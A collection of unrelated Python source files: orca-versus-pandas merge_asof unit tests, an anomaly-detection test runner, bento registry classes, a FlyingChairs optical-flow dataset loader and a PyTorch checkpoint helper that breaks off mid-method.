        # TODO:ORCA by bug
        # odf = orca.merge_asof(self.odfs_bid_csv_left, self.odfs_bid_csv_right, on='bid', left_by='ticker', right_by='ticker')
        # TODO:ORCA by bug
        # assert_frame_equal(odf.to_pandas().fillna(""), pdf.fillna(""), check_dtype=False, check_like=False)
    def test_merge_asof_from_dfs_param_suffixes(self):
        pdf = pd.merge_asof(self.pdf_csv_left, self.pdf_csv_right, on='date', suffixes=('_left', '_right'))
        odf = orca.merge_asof(self.odfs_csv_left, self.odfs_csv_right, on='date', suffixes=('_left', '_right'))
        assert_frame_equal(odf.to_pandas().fillna(""), pdf.fillna(""), check_dtype=False)
        pdf = pd.merge_asof(self.pdf_bid_csv_left, self.pdf_bid_csv_right, on='bid', suffixes=('_left', '_right'))
        odf = orca.merge_asof(self.odfs_bid_csv_left, self.odfs_bid_csv_right, on='bid', suffixes=('_left', '_right'))
        assert_frame_equal(odf.to_pandas().fillna(""), pdf.fillna(""), check_dtype=False, check_like=False)
    def test_merge_asof_from_dfs_param_leftonrighton_param_suffixes(self):
        pdf = pd.merge_asof(self.pdf_csv_left, self.pdf_csv_right, left_on='date', right_on='date',
                            suffixes=('_left', '_right'))
        odf = orca.merge_asof(self.odfs_csv_left, self.odfs_csv_right, left_on='date', right_on='date',
                              suffixes=('_left', '_right'))
        assert_frame_equal(odf.to_pandas().fillna(""), pdf.fillna(""), check_dtype=False)
        pdf = pd.merge_asof(self.pdf_bid_csv_left, self.pdf_bid_csv_right, left_on='bid', right_on='bid',
                            suffixes=('_left', '_right'))
        odf = orca.merge_asof(self.odfs_bid_csv_left, self.odfs_bid_csv_right, left_on='bid', right_on='bid',
                              suffixes=('_left', '_right'))
        assert_frame_equal(odf.to_pandas().fillna(""), pdf.fillna(""), check_dtype=False, check_like=False)
    def test_merge_asof_from_dfs_param_leftonrighton_param_by(self):
        pdf = pd.merge_asof(self.pdf_csv_left, self.pdf_csv_right, left_on='date', right_on='date', by='ticker')
        odf = orca.merge_asof(self.odfs_csv_left, self.odfs_csv_right, left_on='date', right_on='date', by='ticker')
        # TODO:ORCA by bug
        # assert_frame_equal(odf.to_pandas().fillna(""), pdf.fillna(""), check_dtype=False)
        pdf = pd.merge_asof(self.pdf_bid_csv_left, self.pdf_bid_csv_right, left_on='bid', right_on='bid', by='ticker')
        odf = orca.merge_asof(self.odfs_bid_csv_left, self.odfs_bid_csv_right, left_on='bid', right_on='bid', by='ticker')
        # TODO:ORCA by bug
        # assert_frame_equal(odf.to_pandas().fillna(""), pdf.fillna(""), check_dtype=False, check_like=False)
    def test_merge_asof_from_dfs_param_leftonrighton_param_leftbyrightby(self):
        pdf = pd.merge_asof(self.pdf_csv_left, self.pdf_csv_right, on='date', left_by='ticker', right_by='ticker')
        # TODO:ORCA by bug
        # odf = orca.merge_asof(self.odfs_csv_left, self.odfs_csv_right, on='date', left_by='ticker', right_by='ticker')
        # assert_frame_equal(odf.to_pandas().fillna(""), pdf.fillna(""), check_dtype=False)
        pdf = pd.merge_asof(self.pdf_bid_csv_left, self.pdf_bid_csv_right, on='bid', left_by='ticker',
                            right_by='ticker')
        # TODO:ORCA by bug
        # odf = orca.merge_asof(self.odfs_bid_csv_left, self.odfs_bid_csv_right, on='bid', left_by='ticker', right_by='ticker')
        # assert_frame_equal(odf.to_pandas().fillna(""), pdf.fillna(""), check_dtype=False, check_like=False)
    def test_merge_asof_from_dfs_param_index_param_by(self):
        pdf = pd.merge_asof(self.pdf_csv_left_index, self.pdf_csv_right_index, left_index=True, right_index=True,
                            by='ticker')
        odf = orca.merge_asof(self.odfs_csv_left_index, self.odfs_csv_right_index, left_index=True, right_index=True,
                              by='ticker')
        # TODO:ORCA by bug
        # assert_frame_equal(odf.to_pandas().fillna(""), pdf.fillna(""), check_dtype=False)
        pdf = pd.merge_asof(self.pdf_bid_csv_left_index, self.pdf_bid_csv_right_index, left_index=True,
                            right_index=True, by='ticker')
        odf = orca.merge_asof(self.odfs_bid_csv_left_index, self.odfs_bid_csv_right_index, left_index=True,
                              right_index=True, by='ticker')
        # TODO:ORCA by bug
        # assert_frame_equal(odf.to_pandas().fillna(""), pdf.fillna(""), check_dtype=False, check_like=False)
    def test_merge_asof_from_dfs_param_index_param_leftbyrightby(self):
        pdf = pd.merge_asof(self.pdf_csv_left_index, self.pdf_csv_right_index, left_index=True, right_index=True,
                            left_by='ticker', right_by='ticker')
        odf = orca.merge_asof(self.odfs_csv_left_index, self.odfs_csv_right_index, left_index=True, right_index=True,
                              left_by='ticker', right_by='ticker')
        # TODO:ORCA by bug
        # assert_frame_equal(odf.to_pandas().fillna(""), pdf.fillna(""), check_dtype=False)
        pdf = pd.merge_asof(self.pdf_bid_csv_left_index, self.pdf_bid_csv_right_index, left_index=True,
                            right_index=True, left_by='ticker',
                            right_by='ticker')
        odf = orca.merge_asof(self.odfs_bid_csv_left_index, self.odfs_bid_csv_right_index, left_index=True,
                              right_index=True, left_by='ticker',
                              right_by='ticker')
        # TODO:ORCA by bug
        # assert_frame_equal(odf.to_pandas().fillna(""), pdf.fillna(""), check_dtype=False, check_like=False)
    def test_merge_asof_from_dfs_param_index_param_suffixes(self):
        pdf = pd.merge_asof(self.pdf_csv_left_index, self.pdf_csv_right_index, left_index=True, right_index=True,
                            suffixes=('_left', '_right'))
        odf = orca.merge_asof(self.odfs_csv_left_index, self.odfs_csv_right_index, left_index=True, right_index=True,
                              suffixes=('_left', '_right'))
        assert_frame_equal(odf.to_pandas().fillna(""), pdf.fillna(""), check_dtype=False)
        pdf = pd.merge_asof(self.pdf_bid_csv_left_index, self.pdf_bid_csv_right_index, left_index=True,
                            right_index=True, suffixes=('_left', '_right'))
        odf = orca.merge_asof(self.odfs_bid_csv_left_index, self.odfs_bid_csv_right_index, left_index=True,
                              right_index=True,
                              suffixes=('_left', '_right'))
        assert_frame_equal(odf.to_pandas().fillna(""), pdf.fillna(""), check_dtype=False, check_like=False)
    def test_merge_asof_from_dfs_param_on_param_by_suffixes(self):
        pdf = pd.merge_asof(self.pdf_csv_left, self.pdf_csv_right, on='date', by='ticker', suffixes=('_left', '_right'))
        odf = orca.merge_asof(self.odfs_csv_left, self.odfs_csv_right, on='date', by='ticker',
                              suffixes=('_left', '_right'))
        # TODO:ORCA by bug
        # assert_frame_equal(odf.to_pandas().fillna(""), pdf.fillna(""), check_dtype=False)
        pdf = pd.merge_asof(self.pdf_bid_csv_left, self.pdf_bid_csv_right, on='bid', by='ticker',
                            suffixes=('_left', '_right'))
        odf = orca.merge_asof(self.odfs_bid_csv_left, self.odfs_bid_csv_right, on='bid', by='ticker',
                              suffixes=('_left', '_right'))
        # TODO:ORCA by bug
        # assert_frame_equal(odf.to_pandas().fillna(""), pdf.fillna(""), check_dtype=False, check_like=False)
    def test_merge_asof_from_dfs_param_on_param_leftbyrightby_suffixes(self):
        pdf = pd.merge_asof(self.pdf_csv_left, self.pdf_csv_right, on='date',
                            left_by='ticker', right_by='ticker', suffixes=('_left', '_right'))
        # TODO:ORCA by bug
        # odf = orca.merge_asof(self.odfs_csv_left, self.odfs_csv_right, on='date',
        #                       left_by='ticker', right_by='ticker', suffixes=('_left', '_right'))
        # assert_frame_equal(odf.to_pandas().fillna(""), pdf.fillna(""), check_dtype=False)
        pdf = pd.merge_asof(self.pdf_bid_csv_left, self.pdf_bid_csv_right, on='bid', left_by='ticker',
                            right_by='ticker', suffixes=('_left', '_right'))
        # TODO:ORCA by bug
        # odf = orca.merge_asof(self.odfs_bid_csv_left, self.odfs_bid_csv_right, on='bid', left_by='ticker', right_by='ticker', suffixes=('_left', '_right'))
        # assert_frame_equal(odf.to_pandas().fillna(""), pdf.fillna(""), check_dtype=False, check_like=False)
    def test_merge_asof_from_dfs_param_leftonrighton_param_by_suffixes(self):
        pdf = pd.merge_asof(self.pdf_csv_left, self.pdf_csv_right, left_on='date', right_on='date',
                            by='ticker', suffixes=('_left', '_right'))
        odf = orca.merge_asof(self.odfs_csv_left, self.odfs_csv_right, left_on='date', right_on='date',
                              by='ticker', suffixes=('_left', '_right'))
        # TODO:ORCA by bug
        # assert_frame_equal(odf.to_pandas().fillna(""), pdf.fillna(""), check_dtype=False)
        pdf = pd.merge_asof(self.pdf_bid_csv_left, self.pdf_bid_csv_right, left_on='bid', right_on='bid', by='ticker',
                            suffixes=('_left', '_right'))
        pdf.fillna("", inplace=True)
        odf = orca.merge_asof(self.odfs_bid_csv_left, self.odfs_bid_csv_right, left_on='bid', right_on='bid', by='ticker',
                              suffixes=('_left', '_right'))
        # TODO:ORCA by bug
        # assert_frame_equal(odf.to_pandas().fillna(""), pdf.fillna(""), check_dtype=False, check_like=False)
    def test_merge_asof_from_dfs_param_leftonrighton_param_leftbyrightby_suffixes(self):
        pdf = pd.merge_asof(self.pdf_csv_left, self.pdf_csv_right, left_on='date', right_on='date',
                            left_by='ticker', right_by='ticker', suffixes=('_left', '_right'))
        # TODO:ORCA by bug
        # odf = orca.merge_asof(self.odfs_csv_left, self.odfs_csv_right, left_on='date', right_on='date',
        #                       left_by='ticker', right_by='ticker', suffixes=('_left', '_right'))
        # assert_frame_equal(odf.to_pandas().fillna(""), pdf.fillna(""), check_dtype=False)
        pdf = pd.merge_asof(self.pdf_bid_csv_left, self.pdf_bid_csv_right, left_on='bid', right_on='bid',
                            left_by='ticker', right_by='ticker', suffixes=('_left', '_right'))
        # TODO:ORCA by bug
        # odf = orca.merge_asof(self.odfs_bid_csv_left, self.odfs_bid_csv_right, left_on='bid', right_on='bid',
        #                       left_by='ticker', right_by='ticker', suffixes=('_left', '_right'))
        # assert_frame_equal(odf.to_pandas().fillna(""), pdf.fillna(""), check_dtype=False, check_like=False)
    def test_merge_asof_from_dfs_param_index_param_by_suffixes(self):
        pdf = pd.merge_asof(self.pdf_csv_left_index, self.pdf_csv_right_index, left_index=True, right_index=True,
                            by='ticker', suffixes=('_left', '_right'))
        odf = orca.merge_asof(self.odfs_csv_left_index, self.odfs_csv_right_index, left_index=True, right_index=True,
                              by='ticker', suffixes=('_left', '_right'))
        # TODO:ORCA by bug
        # assert_frame_equal(odf.to_pandas().fillna(""), pdf.fillna(""), check_dtype=False)
        pdf = pd.merge_asof(self.pdf_bid_csv_left_index, self.pdf_bid_csv_right_index, left_index=True,
                            right_index=True,
                            by='ticker', suffixes=('_left', '_right'))
        odf = orca.merge_asof(self.odfs_bid_csv_left_index, self.odfs_bid_csv_right_index, left_index=True,
                              right_index=True,
                              by='ticker', suffixes=('_left', '_right'))
        # TODO:ORCA by bug
        # assert_frame_equal(odf.to_pandas().fillna(""), pdf.fillna(""), check_dtype=False, check_like=False)
    def test_merge_asof_from_dfs_param_index_param_leftbyrightby_suffixes(self):
        pdf = pd.merge_asof(self.pdf_csv_left_index, self.pdf_csv_right_index, left_index=True, right_index=True,
                            left_by='ticker', right_by='ticker', suffixes=('_left', '_right'))
        # TODO:ORCA by bug
        # odf = orca.merge_asof(self.odfs_csv_left_index, self.odfs_csv_right_index, left_index=True, right_index=True,
        #                       left_by='ticker', right_by='ticker', suffixes=('_left', '_right'))
        # assert_frame_equal(odf.to_pandas().fillna(""), pdf.fillna(""), check_dtype=False)
        pdf = pd.merge_asof(self.pdf_bid_csv_left_index, self.pdf_bid_csv_right_index, left_index=True,
                            right_index=True,
                            left_by='ticker', right_by='ticker', suffixes=('_left', '_right'))
        # TODO:ORCA by bug
        # odf = orca.merge_asof(self.odfs_bid_csv_left_index, self.odfs_bid_csv_right_index, left_index=True, right_index=True,
        #                       left_by='ticker', right_by='ticker', suffixes=('_left', '_right'))
        # assert_frame_equal(odf.to_pandas().fillna(""), pdf.fillna(""), check_dtype=False, check_like=False)
    def test_merge_asof_from_dfs_param_on_param_index(self):
        pdf = pd.merge_asof(self.pdf_csv_left_index, self.pdf_csv_right, left_index=True, right_on='date')
        # TODO:ORCA error left_index, right_on not supported
        # odf = orca.merge_asof(self.odfs_csv_left_index, self.odfs_csv_right_index, left_index=True, right_on='date')
        # assert_frame_equal(odf.to_pandas().fillna(""), pdf.fillna(""), check_dtype=False)
        pdf = pd.merge_asof(self.pdf_csv_left, self.pdf_csv_right_index, right_index=True, left_on='date')
        # TODO:ORCA error left_index, right_on not supported
        # odf = orca.merge_asof(self.odfs_csv_left, self.odfs_csv_right_index, right_index=True, left_on='date')
        # assert_frame_equal(odf.to_pandas().fillna(""), pdf.fillna(""), check_dtype=False)
        pdf = pd.merge_asof(self.pdf_bid_csv_left_index, self.pdf_bid_csv_right, left_index=True, right_on='bid')
        # TODO:ORCA error left_index, right_on not supported
        # odf = orca.merge_asof(self.odfs_bid_csv_left_index, self.odfs_bid_csv_right, left_index=True, right_on='bid')
        # assert_frame_equal(odf.to_pandas().fillna(""), pdf.fillna(""), check_dtype=False, check_like=False)
        pdf = pd.merge_asof(self.pdf_bid_csv_left, self.pdf_bid_csv_right_index, right_index=True, left_on='bid')
        # TODO:ORCA error left_index, right_on not supported
        # odf = orca.merge_asof(self.odfs_bid_csv_left, self.odfs_bid_csv_right_index, right_index=True, left_on='bid')
        # assert_frame_equal(odf.to_pandas().fillna(""), pdf.fillna(""), check_dtype=False, check_like=False)
    def test_merge_asof_from_dfs_param_on_param_index_param_by(self):
        pdf = pd.merge_asof(self.pdf_csv_left_index, self.pdf_csv_right, left_index=True, right_on='date', by='ticker')
        # TODO:ORCA by bug
        # odf = orca.merge_asof(self.odfs_csv_left_index, self.odfs_csv_right_index, left_index=True, right_on='date', by='ticker')
        # assert_frame_equal(odf.to_pandas().fillna(""), pdf.fillna(""), check_dtype=False)
        pdf = pd.merge_asof(self.pdf_csv_left, self.pdf_csv_right_index, right_index=True, left_on='date', by='ticker')
        # TODO:ORCA by bug
        # odf = orca.merge_asof(self.odfs_csv_left_index, self.odfs_csv_right_index, right_index=True, left_on='date', by='ticker')
        # assert_frame_equal(odf.to_pandas().fillna(""), pdf.fillna(""), check_dtype=False)
        pdf = pd.merge_asof(self.pdf_bid_csv_left_index, self.pdf_bid_csv_right, left_index=True, right_on='bid',
                            by='ticker')
        # TODO:ORCA by bug
        # odf = orca.merge_asof(self.odfs_bid_csv_left_index, self.odfs_bid_csv_right, left_index=True, right_on='bid', by='ticker')
        # assert_frame_equal(odf.to_pandas().fillna(""), pdf.fillna(""), check_dtype=False, check_like=False)
        pdf = pd.merge_asof(self.pdf_bid_csv_left, self.pdf_bid_csv_right_index, right_index=True, left_on='bid',
                            by='ticker')
        # TODO:ORCA by bug
        # odf = orca.merge_asof(self.odfs_bid_csv_left, self.odfs_bid_csv_right_index, right_index=True, left_on='bid', by='ticker')
        # assert_frame_equal(odf.to_pandas().fillna(""), pdf.fillna(""), check_dtype=False, check_like=False)
    def test_merge_asof_from_dfs_param_on_param_index_param_by_param_suffixes(self):
        pdf = pd.merge_asof(self.pdf_csv_left_index, self.pdf_csv_right, left_index=True, right_on='date',
                            by='ticker', suffixes=('_left', '_right'))
        # TODO:ORCA by bug
        # odf = orca.merge_asof(self.odfs_csv_left_index, self.odfs_csv_right_index, left_index=True, right_on='date',
        #                       by='ticker', suffixes=('_left', '_right'))
        # assert_frame_equal(odf.to_pandas().fillna(""), pdf.fillna(""), check_dtype=False)
        pdf = pd.merge_asof(self.pdf_csv_left, self.pdf_csv_right_index, right_index=True, left_on='date',
                            by='ticker', suffixes=('_left', '_right'))
        # TODO:ORCA by bug
        # odf = orca.merge_asof(self.odfs_csv_left_index, self.odfs_csv_right_index, right_index=True, left_on='date',
        #                       by='ticker', suffixes=('_left', '_right'))
        # assert_frame_equal(odf.to_pandas().fillna(""), pdf.fillna(""), check_dtype=False)
        pdf = pd.merge_asof(self.pdf_bid_csv_left_index, self.pdf_bid_csv_right, left_index=True, right_on='bid',
                            by='ticker', suffixes=('_left', '_right'))
        # TODO:ORCA by bug
        # odf = orca.merge_asof(self.odfs_bid_csv_left_index, self.odfs_bid_csv_right, left_index=True, right_on='bid',
        #                       by='ticker', suffixes=('_left', '_right'))
        # assert_frame_equal(odf.to_pandas().fillna(""), pdf.fillna(""), check_dtype=False, check_like=False)
        pdf = pd.merge_asof(self.pdf_bid_csv_left, self.pdf_bid_csv_right_index, right_index=True, left_on='bid',
                            by='ticker', suffixes=('_left', '_right'))
        # TODO:ORCA by bug
        # odf = orca.merge_asof(self.odfs_bid_csv_left, self.odfs_bid_csv_right_index, right_index=True, left_on='bid',
        #                       by='ticker', suffixes=('_left', '_right'))
        # assert_frame_equal(odf.to_pandas().fillna(""), pdf.fillna(""), check_dtype=False, check_like=False)
# Run the suite when this module is executed directly.
if __name__ == '__main__':
    unittest.main()
|
1690940
|
import argparse
from argparse import Namespace
from datasets import CIFAR10
from datasets import MNIST
from datasets import SHANGHAITECH
from datasets import UCSDPed2
from models import LSACIFAR10
from models import LSAMNIST
from models import LSAShanghaiTech
from models import LSAUCSD
from result_helpers import OneClassResultHelper
from result_helpers import VideoAnomalyDetectionResultHelper
from utils import set_random_seed
def test_mnist():
    # type: () -> None
    """Run one-class classification tests on MNIST."""
    dataset = MNIST(path='data/MNIST')
    model = LSAMNIST(input_shape=dataset.shape, code_length=64, cpd_channels=100)
    model = model.cuda().eval()
    helper = OneClassResultHelper(dataset, model,
                                  checkpoints_dir='checkpoints/mnist/',
                                  output_file='mnist.txt')
    helper.test_one_class_classification()
def test_cifar():
    # type: () -> None
    """Run one-class classification tests on CIFAR-10."""
    dataset = CIFAR10(path='data/CIFAR10')
    model = LSACIFAR10(input_shape=dataset.shape, code_length=64, cpd_channels=100)
    model = model.cuda().eval()
    helper = OneClassResultHelper(dataset, model,
                                  checkpoints_dir='checkpoints/cifar10/',
                                  output_file='cifar10.txt')
    helper.test_one_class_classification()
def test_ucsdped2():
    # type: () -> None
    """Run video anomaly detection tests on UCSD Ped2."""
    dataset = UCSDPed2(path='data/UCSD_Anomaly_Dataset.v1p2')
    model = LSAUCSD(input_shape=dataset.shape, code_length=64, cpd_channels=100)
    model = model.cuda().eval()
    helper = VideoAnomalyDetectionResultHelper(dataset, model,
                                               checkpoint='checkpoints/ucsd_ped2.pkl',
                                               output_file='ucsd_ped2.txt')
    helper.test_video_anomaly_detection()
def test_shanghaitech():
    # type: () -> None
    """Run video anomaly detection tests on ShanghaiTech."""
    dataset = SHANGHAITECH(path='data/shanghaitech')
    model = LSAShanghaiTech(input_shape=dataset.shape, code_length=64, cpd_channels=100)
    model = model.cuda().eval()
    helper = VideoAnomalyDetectionResultHelper(dataset, model,
                                               checkpoint='checkpoints/shanghaitech.pkl',
                                               output_file='shanghaitech.txt')
    helper.test_video_anomaly_detection()
def parse_arguments():
    # type: () -> Namespace
    """
    Argument parser.
    :return: the command line arguments.
    """
    parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
    # Fix: the two implicitly-concatenated help strings were missing a
    # separating space, rendering as "tests on.Choose among ...".
    parser.add_argument('dataset', type=str,
                        help='The name of the dataset to perform tests on. '
                             'Choose among `mnist`, `cifar10`, `ucsd-ped2`, `shanghaitech`', metavar='')
    return parser.parse_args()
def main():
    """Entry point: parse the CLI, lock seeds, and dispatch the chosen test."""
    # Parse command line arguments
    args = parse_arguments()
    # Lock seeds
    set_random_seed(30101990)
    # Dispatch the selected dataset's test via a lookup table.
    runners = {
        'mnist': test_mnist,
        'cifar10': test_cifar,
        'ucsd-ped2': test_ucsdped2,
        'shanghaitech': test_shanghaitech,
    }
    runner = runners.get(args.dataset)
    if runner is None:
        raise ValueError(f'Unknown dataset: {args.dataset}')
    runner()
# Entry point: run the CLI dispatcher when executed as a script.
if __name__ == '__main__':
    main()
|
1690959
|
from bento.compat.api \
import \
defaultdict
class CommandRegistry(object):
    """Maps command-line names to command classes, tracking private commands."""

    def __init__(self):
        # command line name -> command class
        self._klasses = {}
        # command line name -> None for private commands
        self._privates = {}

    def register(self, name, cmd_klass, public=True):
        """Register *cmd_klass* under *name*; private commands stay hidden."""
        if name in self._klasses:
            raise ValueError("context for command %r already registered !" % name)
        self._klasses[name] = cmd_klass
        if not public:
            self._privates[name] = None

    def retrieve(self, name):
        """Return the command class for *name*, raising ValueError if absent."""
        cmd_klass = self._klasses.get(name)
        if cmd_klass is None:
            raise ValueError("No command class registered for name %r" % name)
        return cmd_klass

    def is_registered(self, name):
        return name in self._klasses

    def command_names(self):
        return self._klasses.keys()

    def public_command_names(self):
        return [name for name in self._klasses if name not in self._privates]
class ContextRegistry(object):
    """Maps command names to context objects, with an optional fallback."""

    def __init__(self, default=None):
        self._contexts = {}
        self.set_default(default)

    def set_default(self, default):
        """Set the fallback context returned for unregistered commands."""
        self._default = default

    def is_registered(self, cmd_name):
        return cmd_name in self._contexts

    def register(self, cmd_name, context):
        """Register *context* for *cmd_name*; duplicate names are rejected."""
        if cmd_name in self._contexts:
            raise ValueError("context for command %r already registered !" % cmd_name)
        self._contexts[cmd_name] = context

    def retrieve(self, cmd_name):
        """Return the context for *cmd_name*, falling back to the default."""
        found = self._contexts.get(cmd_name)
        if found is not None:
            return found
        if self._default is None:
            raise ValueError("No context registered for command %r" % cmd_name)
        return self._default
class OptionsRegistry(object):
    """Registry for command -> option context"""

    def __init__(self):
        # command line name -> context *instance*
        self._contexts = {}

    def register(self, cmd_name, options_context):
        """Register *options_context* for *cmd_name*; duplicates are rejected."""
        if cmd_name in self._contexts:
            raise ValueError("options context for command %r already registered !" % cmd_name)
        self._contexts[cmd_name] = options_context

    def is_registered(self, cmd_name):
        return cmd_name in self._contexts

    def retrieve(self, cmd_name):
        """Return the options context for *cmd_name*, raising if absent."""
        options_context = self._contexts.get(cmd_name)
        if options_context is None:
            raise ValueError("No options context registered for cmd_name %r" % cmd_name)
        return options_context
class _Dummy(object):
pass
class _RegistryBase(object):
"""A simple registry of sets of callbacks, one set per category."""
def __init__(self):
self._callbacks = {}
self.categories = _Dummy()
def register_category(self, category, default_builder):
if category in self._callbacks:
raise ValueError("Category %r already registered" % category)
else:
self._callbacks[category] = defaultdict(lambda: default_builder)
setattr(self.categories, category, _Dummy())
def register_callback(self, category, name, builder):
c = self._callbacks.get(category, None)
if c is not None:
c[name] = builder
cat = getattr(self.categories, category)
setattr(cat, name, builder)
else:
raise ValueError("category %s is not registered yet" % category)
def callback(self, category, name):
if not category in self._callbacks:
raise ValueError("Unregistered category %r" % category)
else:
return self._callbacks[category][name]
def default_callback(self, category, *a, **kw):
if not category in self._callbacks:
raise ValueError("Unregistered category %r" % category)
else:
return self._callbacks[category].default_factory()(*a, **kw)
class BuilderRegistry(_RegistryBase):
    """Callback registry whose callbacks are builders; `builder` aliases `callback`."""
    builder = _RegistryBase.callback
class ISectionRegistry(_RegistryBase):
    """Callback registry for section registrers; `registrer` aliases `callback`."""
    registrer = _RegistryBase.callback
class OutputRegistry(object):
    """Registry of build outputs grouped by category and name.

    Each category maps a name to the tuple (nodes, from_node, target_dir);
    `installed_categories` records each category's install-category string.
    """

    def __init__(self, categories=None):
        # category -> {name: (nodes, from_node, target_dir)}
        self.categories = {}
        # category -> installed category string
        self.installed_categories = {}
        if categories:
            for category, installed_category in categories:
                self.register_category(category, installed_category)

    def register_category(self, category, installed_category):
        if category in self.categories:
            # Fix: the original raised with a bare "%r" placeholder and never
            # interpolated the category name into the message.
            raise ValueError("Category %r already registered" % category)
        self.categories[category] = {}
        self.installed_categories[category] = installed_category

    def register_outputs(self, category, name, nodes, from_node, target_dir):
        if category not in self.categories:
            raise ValueError("Unknown category %r" % category)
        cat = self.categories[category]
        if name in cat:
            # Fix: message typo "categoryr" -> "category".
            raise ValueError("Outputs for category=%r and name=%r already registered" % (category, name))
        cat[name] = (nodes, from_node, target_dir)

    def iter_category(self, category):
        # Generator: the ValueError surfaces on first iteration, as before.
        if category not in self.categories:
            raise ValueError("Unknown category %r" % category)
        for k, v in self.categories[category].items():
            yield k, v[0], v[1], v[2]

    def iter_over_category(self):
        for category in self.categories:
            for name, nodes, from_node, target_dir in self.iter_category(category):
                yield category, name, nodes, from_node, target_dir
|
1690979
|
import os
import os.path as osp
import sys
import torch
import torch.utils.data as data
import torchvision.transforms as transforms
import cv2
import numpy as np
from .config import cfg, MEANS, STD
from pycocotools import mask as maskUtils
import contextlib
import io
import logging
import time
def collate_fn_flying_chairs(batch):
    """Collate (img1, img2, flow) samples into three stacked batch tensors."""
    firsts = [sample[0] for sample in batch]
    seconds = [sample[1] for sample in batch]
    flows = [sample[2] for sample in batch]
    return torch.stack(firsts, 0), torch.stack(seconds, 0), torch.stack(flows, 0)
class FlyingChairs(data.Dataset):
    """FlyingChairs optical-flow dataset (image pair + .flo ground truth).

    Args:
        image_path (string): Root directory containing the *.ppm / *.flo files.
        info_file (string): Path to the train/val split file, one label per
            line (1 = train sample, 2 = validation sample).
        is_train (bool): If True keep training samples, otherwise validation.
    """

    def __init__(self, image_path, info_file, is_train=True):
        self.root = image_path
        with open(info_file, "r") as file:
            res = file.read()
        ids = res.split('\n')
        ids = [int(x) for x in ids if x]
        # Split labels: 1 marks training samples, 2 marks validation samples.
        keep_label = 1 if is_train else 2
        ids = {idx: x for idx, x in enumerate(ids) if x == keep_label}
        self.ids = list(ids.keys())

    def __getitem__(self, index):
        # File names are 1-based: "00001_img1.ppm", "00001_flow.flo", ...
        flow_id = self.ids[index] + 1
        img1_path = os.path.join(self.root, "{:05d}_img1.ppm".format(flow_id))
        img2_path = os.path.join(self.root, "{:05d}_img2.ppm".format(flow_id))
        flow_path = os.path.join(self.root, "{:05d}_flow.flo".format(flow_id))
        img1 = self.readImage(img1_path)
        img2 = self.readImage(img2_path)
        flow = self.readFlow(flow_path)
        h, w, _ = img1.shape
        # Rescale flow values to the resized coordinate frame -- the exact
        # "* 2 ... * 8" scaling presumably matches the network's output
        # stride; TODO confirm against the model.
        flow = flow * 2 / np.array([w, h]) * 8
        target_size = (550, 550)  # FIXME: hard code image size
        img1 = cv2.resize(img1, target_size)
        img2 = cv2.resize(img2, target_size)
        flow = cv2.resize(flow, target_size)
        img1 = (img1 - MEANS) / STD
        img2 = (img2 - MEANS) / STD
        # BGR (cv2) -> RGB channel order.
        img1 = img1[:, :, ::-1]
        img2 = img2[:, :, ::-1]
        img1 = img1.astype(np.float32)
        img2 = img2.astype(np.float32)
        flow = flow.astype(np.float32)
        t = transforms.ToTensor()
        return t(img1), t(img2), t(flow)

    def __len__(self):
        return len(self.ids)

    @staticmethod
    def readFlow(name):
        """Read a Middlebury .flo file and return an (H, W, 2) float32 array."""
        # BUG FIX: the original opened the file without ever closing it.
        with open(name, 'rb') as f:
            header = f.read(4)
            if header.decode("utf-8") != 'PIEH':
                raise Exception('Flow file header does not contain PIEH')
            width = np.fromfile(f, np.int32, 1).squeeze()
            height = np.fromfile(f, np.int32, 1).squeeze()
            flow = np.fromfile(f, np.float32, width * height * 2).reshape((height, width, 2))
        return flow.astype(np.float32)

    @staticmethod
    def readImage(name):
        return cv2.imread(name)
|
1691042
|
import os
import torch
import torch.nn as nn
from core.model_transform import *
from core.utils import is_main_process
__all__ = ["CheckPoint"]
class CheckPoint(object):
    """
    Save model / training state to file.

    check_point_params keys: model, optimizer, lr_scheduler, epoch
    """

    def __init__(self, save_path, logger):
        """
        :params save_path: directory under which a "check_point" folder is created
        :params logger: logger used for status/error messages (may be None)
        """
        self.save_path = os.path.join(save_path, "check_point")
        self.check_point_params = {
            "model": None,
            "optimizer": None,
            "lr_scheduler": None,
            "epoch": None,
        }
        self.logger = logger
        # make directory (main process only, to avoid races in distributed runs)
        if is_main_process():
            if not os.path.isdir(self.save_path):
                os.makedirs(self.save_path)

    def load_state(self, model, state_dict):
        """
        load state_dict to model

        Keys present in state_dict but missing from the model are logged
        and skipped instead of raising.

        :params model:
        :params state_dict:
        :return: model
        """
        model.eval()
        model_dict = model.state_dict()
        for key, value in list(state_dict.items()):
            if key in model_dict:
                model_dict[key] = value
            else:
                if self.logger:
                    self.logger.error("key error: {}".format(key))
                # assert False
        model.load_state_dict(model_dict)
        return model

    def load_model(self, model_path):
        """
        load model
        :params model_path: path to the model
        :return: model_state_dict
        """
        if os.path.isfile(model_path):
            if self.logger:
                self.logger.info("|===>Load retrain model from: {}".format(model_path))
            # BUG FIX: map_location was the set literal {"cpu"}, which is not
            # a valid torch.load map_location; use the device string instead.
            model_state_dict = torch.load(model_path, map_location="cpu")
            return model_state_dict
        else:
            assert False, "file not exits, model path: " + model_path

    def load_checkpoint(self, checkpoint_path):
        """
        load checkpoint file
        :params checkpoint_path: path to the checkpoint file
        :return: model_state_dict, optimizer_state_dict, epoch, lr_scheduler
        """
        if os.path.isfile(checkpoint_path):
            if self.logger:
                self.logger.info(
                    "|===>Load resume check-point from: {}".format(checkpoint_path)
                )
            self.check_point_params = torch.load(checkpoint_path, map_location="cpu")
            model_state_dict = self.check_point_params["model"]
            optimizer_state_dict = self.check_point_params["optimizer"]
            lr_scheduler = self.check_point_params["lr_scheduler"]
            epoch = self.check_point_params["epoch"]
            return model_state_dict, optimizer_state_dict, epoch, lr_scheduler
        else:
            assert False, "file not exits" + checkpoint_path

    def save_checkpoint(self, model, optimizer, lr_scheduler, epoch, index=0):
        """
        :params model: model
        :params optimizer: optimizer
        :params lr_scheduler: learning-rate scheduler
        :params epoch: training epoch
        :params index: index of saved file, default: 0

        Note: if we add hook to the grad by using register_hook(hook), then the hook function
        can not be saved so we need to save state_dict() only. Although save state dictionary
        is recommended, some times we still need to save the whole model as it can save all
        the information of the trained model, and we do not need to create a new network in
        next time. However, the GPU information will be saved too, which leads to some issues
        when we use the model on different machine
        """
        # get state_dict from model and optimizer
        model = list2sequential(model)
        if isinstance(model, nn.DataParallel):
            model = model.module
        model = model.state_dict()
        optimizer = optimizer.state_dict()
        lr_scheduler = lr_scheduler.state_dict()
        # save information to a dict
        self.check_point_params["model"] = model
        self.check_point_params["optimizer"] = optimizer
